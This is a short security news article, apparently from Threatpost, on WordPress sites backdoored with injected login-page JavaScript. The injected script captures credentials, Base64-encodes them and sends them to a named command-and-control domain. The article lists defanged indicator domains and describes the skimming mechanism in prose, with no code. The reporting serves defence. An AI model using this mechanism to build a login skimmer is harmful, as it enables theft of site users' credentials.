this-side-up-media-wordpress-website-security-backdoor-malware

WP Sites Backdoored, Leaking Credentials

by Michael Mimoso

WordPress site administrators just cannot come up for air.

With a raft of WordPress vulnerabilities—most of them in plugins—to address, now comes word that a number of sites running the content management system have been compromised and are sending credentials via a backdoor to a criminal group.

Researchers at Zscaler on Thursday said that the backdoor code implanted on the sites awakens when a user inputs login credentials

“The credentials are encoded and sent to an attacker website in the form of a GET request,” said researchers Sameer Patil and Deepen Desai.

Zscaler said it has identified one command and control domain, conyouse[.]com where the credentials are being sent. The researchers also released a partial list of compromised WordPress sites:

shoneekapoor[.]com
dwaynefrancis[.]com
blissfields[.]co[.]uk
avalineholding[.]com
attherighttime[.]net
bolsaemprego[.]ne
capitaltrill[.]com
blowdrybar[.]es
espada[.]co[.]uk
technograte[.]com
socalhistory[.]org
blissfields[.]co[.]uk
glasgowcontemporarychoir[.]com
sombornefp[.]co[.]uk
reciclaconloscincosentidos[.]com
testrmb[.]com
digivelum[.]com
laflordelys[.]com
“When unsuspecting users attempt to login to one of the compromised WordPress sites, they are served injected JavaScript code as part of the login page,” Patil and Desai wrote. The malicious JavaScript is hosted on the C&C site, the researchers added, and is present in a file called wp.js.

“The form containing the username and password input box has a fixed name as ‘loginform‘ in all WordPress sites,” the researchers said. “The preventDefault event method is used to cancel the submit event for “loginform“ entity and execute the alternate code which is present in this file. The login credential string is serialized and encoded in a Base64 format.”

continue reading on threatpost